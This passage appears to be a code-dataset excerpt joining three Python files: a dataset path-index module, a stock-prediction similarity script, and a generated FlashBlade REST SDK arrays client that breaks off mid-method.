"""
Is this dataset archived?
(an archived dataset is one that is not intended to be used by users anymore: eg. it has been
replaced by another dataset. It will not show up in search results, but still exists in the
system via provenance chains or through id lookup.)
:rtype: bool
"""
return self.archived_time is not None
def __eq__(self, other):
if not other:
return False
return self.id == other.id
def __hash__(self):
return hash(self.id)
@classmethod
def from_agdc(cls, dataset: Dataset):
return DatasetLite(dataset.id, archived_time=dataset.archived_time)
def __repr__(self):
return simple_object_repr(self)
class DatasetPathIndex:
"""
An index of datasets and their URIs.
This is a slightly questionable attempt to make testing/mocking simpler.
There's two implementations: One in-memory and one that uses a real datacube.
(MemoryDatasetPathIndex and AgdcDatasetPathIndex)
"""
def iter_all_uris(self, query: dict) -> Iterable[str]:
raise NotImplementedError
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
raise NotImplementedError
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
raise NotImplementedError
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
raise NotImplementedError
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
raise NotImplementedError
def add_dataset(self, dataset: DatasetLite, uri: str):
raise NotImplementedError
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""Map of all datasets to their uri list. Convenience method for tests"""
raise NotImplementedError
def close(self):
"""Do any clean-up as needed before forking."""
# Default implementation: no-op
pass
class AgdcDatasetPathIndex(DatasetPathIndex):
def __init__(self, index: Index) -> None:
super().__init__()
self._index = index
self._rules = dataset_script.load_rules_from_types(self._index)
def iter_all_uris(self, query: dict) -> Iterable[str]:
for uri, in self._index.datasets.search_returning(['uri'], **query):
yield str(uri)
@classmethod
def connect(cls) -> 'AgdcDatasetPathIndex':
return cls(index_connect(application_name='digitalearthau-pathsync'))
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
for d in self._index.datasets.get_datasets_for_location(uri=uri):
yield DatasetLite.from_agdc(d)
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
was_removed = self._index.datasets.remove_location(dataset.id, uri)
return was_removed
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
agdc_dataset = self._index.datasets.get(dataset_id)
return DatasetLite.from_agdc(agdc_dataset) if agdc_dataset else None
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
was_removed = self._index.datasets.add_location(dataset.id, uri)
return was_removed
def add_dataset(self, dataset: DatasetLite, uri: str):
path = uri_to_local_path(uri)
for d in dataset_script.load_datasets([path], self._rules):
if d.id == dataset.id:
self._index.datasets.add(d, sources_policy='ensure')
break
else:
raise RuntimeError('Dataset not found at path: %s, %s' % (dataset.id, uri))
def close(self):
self._index.close()
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""
All contained (dataset, [location]) values, to check test results.
"""
return dict(
(
DatasetLite(dataset.id),
tuple(dataset.uris)
)
for dataset in self._index.datasets.search()
)
def __enter__(self):
return self
def __exit__(self, type_, value, traceback):
self.close()
class MemoryDatasetPathIndex(DatasetPathIndex):
"""
An in-memory implementation, so that we can test without using a real datacube index.
"""
def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
for d in self._records.keys():
if d.id == dataset_id:
return d
return None
def __init__(self):
super().__init__()
# Map of dataset to locations.
self._records = collections.defaultdict(list) # type: Mapping[DatasetLite, List[str]]
def reset(self):
self._records = collections.defaultdict(list)
def iter_all_uris(self, query: dict) -> Iterable[str]:
for uris in self._records.values():
yield from uris
def add_location(self, dataset: DatasetLite, uri: str) -> bool:
if dataset not in self._records:
raise ValueError("Unknown dataset {} -> {}".format(dataset.id, uri))
return self._add(dataset, uri)
def _add(self, dataset_id, uri):
if uri in self._records[dataset_id]:
# Not added
return False
self._records[dataset_id].append(uri)
return True
def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
if uri not in self._records[dataset]:
# Not removed
return False
# We never remove the dataset key, only the uris.
self._records[dataset].remove(uri)
return True
def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
for dataset, uris in self._records.items():
if uri in uris:
yield dataset
def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
"""
All contained (dataset, [location]) values, to check test results.
"""
return {id_: tuple(uris) for id_, uris in self._records.items()}
def add_dataset(self, dataset: DatasetLite, uri: str):
# We're not actually storing datasets...
return self._add(dataset, uri)
| [
"[email protected]"
]
| |
b7a6cb5c45e46e496ff9ac7299b59ead5a70c670 | 6809cda579a7c1c88872f566d65f665c2dff20bb | /archive3/lib/prediction.py | 43f01be6f1370c641d2afae4f8720168f3c9e38e | []
| no_license | hellojixian/stock-dummy | edb3e7447e26ec3e0481c938fcf8f72063d6c850 | 06b352ba3d78ac419e7672b0e6ec630f6f461ae8 | refs/heads/master | 2020-06-15T09:11:33.401689 | 2019-11-05T15:46:43 | 2019-11-05T15:46:43 | 195,256,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,043 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import sys,os,datetime,time
import gc
# 强制转换成整数 为了加速搜索 至少减少内存消耗了
def optimize_df(df):
int_cols = df.columns[:-2]
float_cols = ['future_profit','future_risk']
df_float = df[float_cols].copy()
df = df.astype('b')
df[float_cols] = df_float
return df
def predict(sample, kb):
start_timestamp = time.time()
future = ['future_profit','future_risk']
def _check_similarity_loss(v, sample):
return np.abs(v-sample).sum()
filters_setting = {
'prev0_change' :[ 0, 0],
'prev1_change' :[ 0, 0],
'prev2_change' :[ 0, 0],
'trend_5' :[ 0, 0],
'trend_10' :[ 0, 0],
'prev0_bar' :[-1, 1],
'trend_30' :[-1, 1],
'pos_5' :[-1, 1],
'pos_10' :[-1, 1],
'pos_30' :[-1, 1],
'prev4_change' :[-1, 1],
'trend_120' :[-1, 1],
'pos_120' :[-1, 1],
'amp_5' :[-2, 2],
'risk_10' :[-1, 1],
'risk_20' :[-2, 2],
'amp_30' :[-3, 3],
'prev0_open_c' :[-2, 2],
'prev1_open_c' :[-2, 2],
'prev1_bar' :[-2, 2],
'prev0_up_line' :[-2, 2],
'prev0_down_line' :[-2, 2],
}
filters = filters_setting.copy()
filter_limit = 0
factors = list(filters.keys())
filter_limit=2
filter_offest=1
while filter_offest<filter_limit:
_filter = ""
for f in factors:
offest = np.clip([-filter_offest, filter_offest], filters[f][0], filters[f][1])
_filter += "({}>={}) & ({}<={}) &".format(
f,int(sample[f]+offest[0]),
f,int(sample[f]+offest[1]))
_filter = _filter[:-1]
rs = kb[kb.eval(_filter)].copy()
if len(rs)<=10:
filter_offest +=1
else:
break
pred = pd.Series()
kb_sample_count = rs.shape[0]
reduced_sample_count = 0
if kb_sample_count >10:
pred['result'] = True
rs['similarity_loss'] = rs.apply(func=_check_similarity_loss, args=[sample], raw=True, axis=1)
rs = rs.sort_values(by=['similarity_loss'],ascending=True)
rs = rs[rs.similarity_loss<=15]
rs = rs[:20]
reduced_sample_count = rs.shape[0]
if reduced_sample_count<=2:
pred['result'] = False
for f in future:
pred['{}_mean'.format(f)] = rs[f].mean()
settings = {'med':0.5}
for k in settings:
v = settings[k]
pred['{}_{}'.format(f,k)] = rs[f].quantile(v)
pred['similarity_loss'] = rs['similarity_loss'].max()
else:
pred['result'] = False
pred['similarity_loss'] = float('nan')
pred['samples_count'] = int(kb_sample_count)
pred['reduced_count'] = int(reduced_sample_count)
pred['durtion'] = np.round((time.time() - start_timestamp),2)
return pred
| [
"[email protected]"
]
| |
19ebe0e0280c2829c58678866cdc0eb3a1da7611 | bbe6f37f7347cb83f08846d505ac4aa6bc0031e6 | /purity_fb/purity_fb_1dot9/apis/arrays_api.py | 7bd8335e17e2cf1d85d4d5361d2a51ff900af97e | [
"Apache-2.0"
]
| permissive | bsamz-ps/purity_fb_python_client | 02ff7213075cf1948e2db7b0835cc5fcc56f328a | 11f27ef0c72d8aac1fc4e1ed036cca038b85dfa4 | refs/heads/master | 2021-02-19T08:11:04.042758 | 2020-02-12T23:56:08 | 2020-02-12T23:56:08 | 245,294,511 | 0 | 0 | NOASSERTION | 2020-03-06T00:14:27 | 2020-03-06T00:14:26 | null | UTF-8 | Python | false | false | 43,419 | py | # coding: utf-8
"""
Pure Storage FlashBlade REST 1.9 Python SDK
Pure Storage FlashBlade REST 1.9 Python SDK. Compatible with REST API versions 1.0 - 1.9. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.9
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ArraysApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def list_arrays(self, **kwargs):
"""
List arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_with_http_info(**kwargs)
else:
(data) = self.list_arrays_with_http_info(**kwargs)
return data
def list_arrays_with_http_info(self, **kwargs):
"""
List arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_http_specific_performance(self, **kwargs):
"""
List instant or historical http specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_http_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayHttpPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_http_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_http_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_http_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical http specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_http_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayHttpPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_http_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/http-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayHttpPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_nfs_specific_performance(self, **kwargs):
"""
List instant or historical nfs specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_nfs_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayNfsPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_nfs_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical nfs specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_nfs_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayNfsPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_nfs_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/nfs-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayNfsPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_performance(self, **kwargs):
"""
List instant or historical array performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:return: ArrayPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_performance_with_http_info(**kwargs)
return data
def list_arrays_performance_with_http_info(self, **kwargs):
"""
List instant or historical array performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:return: ArrayPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution', 'protocol']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'protocol' in params:
query_params.append(('protocol', params['protocol']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_performance_replication(self, **kwargs):
"""
List instant or historical array replication performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_replication(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param int start_time: Time to start sample in milliseconds since epoch.
:param str type: to sample space of either file systems, object store, or all
:return: ArrayPerformanceReplicationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_performance_replication_with_http_info(**kwargs)
else:
(data) = self.list_arrays_performance_replication_with_http_info(**kwargs)
return data
def list_arrays_performance_replication_with_http_info(self, **kwargs):
"""
List instant or historical array replication performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_replication_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param int start_time: Time to start sample in milliseconds since epoch.
:param str type: to sample space of either file systems, object store, or all
:return: ArrayPerformanceReplicationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['end_time', 'resolution', 'start_time', 'type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_performance_replication" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/performance/replication', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceReplicationResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_s3_specific_performance(self, **kwargs):
"""
List instant or historical object store specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_s3_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayS3PerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_s3_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_s3_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_s3_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical object store specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_s3_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayS3PerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_s3_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/s3-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayS3PerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_space(self, **kwargs):
"""
List instant or historical array space
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_space(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str type: to sample space of either file systems, object store, or all
:return: ArraySpaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_space_with_http_info(**kwargs)
else:
(data) = self.list_arrays_space_with_http_info(**kwargs)
return data
def list_arrays_space_with_http_info(self, **kwargs):
"""
List instant or historical array space
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_space_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str type: to sample space of either file systems, object store, or all
:return: ArraySpaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution', 'type']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_space" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'type' in params:
query_params.append(('type', params['type']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/space', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArraySpaceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_clients_performance(self, **kwargs):
"""
List client performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_clients_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: The way to order the results.
:param int limit: limit, should be >= 0
:return: ClientPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_clients_performance_with_http_info(**kwargs)
else:
(data) = self.list_clients_performance_with_http_info(**kwargs)
return data
def list_clients_performance_with_http_info(self, **kwargs):
"""
List client performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_clients_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param str sort: The way to order the results.
:param int limit: limit, should be >= 0
:return: ClientPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'sort', 'limit']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_clients_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/clients/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClientPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_arrays(self, array_settings, **kwargs):
"""
Update arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_arrays(array_settings, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param PureArray array_settings: (required)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
